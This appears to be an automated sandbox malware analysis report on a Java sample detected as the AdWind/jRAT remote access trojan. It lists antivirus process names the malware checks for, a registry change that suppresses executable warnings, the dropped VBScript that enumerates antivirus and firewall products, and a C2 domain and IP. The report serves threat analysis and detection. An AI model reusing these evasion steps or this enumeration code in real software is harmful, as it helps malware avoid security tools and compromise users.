Source: cscript.exe, 0000000B.00000003.1684085161.000000000333E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1684309240.0000000003342000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000002.1684930666.0000000003343000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1683697790.0000000003359000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000003.1684820314.0000000003585000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000002.1685492246.0000000003588000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000003.1684796867.00000000035C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FPAVServer.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: mbam.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QUHLPSVC.EXE
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FProtTray.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ClamWin.exe
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: op_mon.exe
Add executable type to lowriskfiletypes to avoid warning prompt
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: LowRiskFileTypes .avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected AdWind RATs dll
Source: Yara match File source: 6.2.javaw.exe.73a90000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.java.exe.a744bf4.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll, type: DROPPED

Remote Access Functionality
barindex
Detected ADWIND Rat
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNext Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext Jump to dropped file
Yara detected AdWind RATs dll
Source: Yara match File source: 6.2.javaw.exe.73a90000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.java.exe.a744bf4.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll, type: DROPPED
Java source code contains strings found in CrossRAT
Source: _0.337891030941391956323023258775833856.class.6.dr Suspicious string: operational.JRat (in operational/Jrat.java)
Source: krmyqqmohp.txt.5.dr Suspicious string: operational.JRat (in operational/Jrat.java)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A911B0 _Java_com_Title_disableListener@8, 6_2_73A911B0
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A91110 _Java_com_Title_enabletListener@8,SetWinEventHook,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,_wprintf,GetMessageW, 6_2_73A91110
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427166 Sample: NewOrder - P2D041197.jar Startdate: 17/04/2024 Architecture: WINDOWS Score: 100 92 pnauco5.ddns.net 2->92 98 Multi AV Scanner detection for domain / URL 2->98 100 Malicious sample detected (through community Yara rule) 2->100 102 Antivirus detection for dropped file 2->102 106 11 other signatures 2->106 12 cmd.exe 2 2->12         started        signatures3 104 Uses dynamic DNS services 92->104 process4 signatures5 122 Uses regedit.exe to modify the Windows registry 12->122 15 java.exe 10 12->15         started        18 conhost.exe 12->18         started        process6 file7 90 C:\Users\user\zbrspjjraf.js, ASCII 15->90 dropped 20 wscript.exe 1 2 15->20         started        23 icacls.exe 1 15->23         started        process8 signatures9 108 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->108 25 javaw.exe 24 20->25         started        30 conhost.exe 23->30         started        process10 dnsIp11 94 pnauco5.ddns.net 103.151.123.225, 49739, 5000 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN unknown 25->94 96 127.0.0.1 unknown unknown 25->96 82 C:\Users\...\Windows6471774156078736222.dll, PE32 25->82 dropped 84 C:\...\mNuEFMHNfs1412424943545557855.reg, ASCII 25->84 dropped 86 C:\Users\...\Retrive4614601071766058238.vbs, ASCII 25->86 dropped 88 C:\Users\...\Retrive4410908985771939559.vbs, ASCII 25->88 dropped 110 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 25->110 112 Excessive usage of taskkill to terminate processes 25->112 32 xcopy.exe 25->32         started        35 cmd.exe 25->35         started        37 java.exe 9 25->37         started        39 26 other processes 25->39 file12 signatures13 process14 file15 70 C:\Users\user\AppData\Roaming\...\zip.dll, PE32 32->70 dropped 72 C:\Users\user\AppData\...\wsdetect.dll, PE32 32->72 dropped 74 C:\Users\user\AppData\...\w2k_lsa_auth.dll, PE32 32->74 dropped 80 132 other malicious files 32->80 dropped 41 conhost.exe 32->41         started        43 regedit.exe 35->43         started        46 conhost.exe 35->46         started        76 C:\Users\...\Retrive6937263458449411198.vbs, ASCII 37->76 dropped 78 C:\Users\...\Retrive508991219844214216.vbs, ASCII 37->78 dropped 48 cmd.exe 37->48         started        50 cmd.exe 37->50         started        52 xcopy.exe 37->52         started        54 conhost.exe 37->54         started        56 conhost.exe 39->56         started        58 27 other processes 39->58 process16 signatures17 114 Creates an undocumented autostart registry key 43->114 116 Disables zone checking for all users 43->116 118 Creates a Image File Execution Options (IFEO) Debugger entry 43->118 120 3 other signatures 43->120 60 conhost.exe 48->60         started        62 cscript.exe 48->62         started        64 conhost.exe 50->64         started        66 cscript.exe 50->66         started        68 conhost.exe 52->68         started        process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.151.123.225
 pnauco5.ddns.net unknown
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
pnauco5.ddns.net 103.151.123.225 true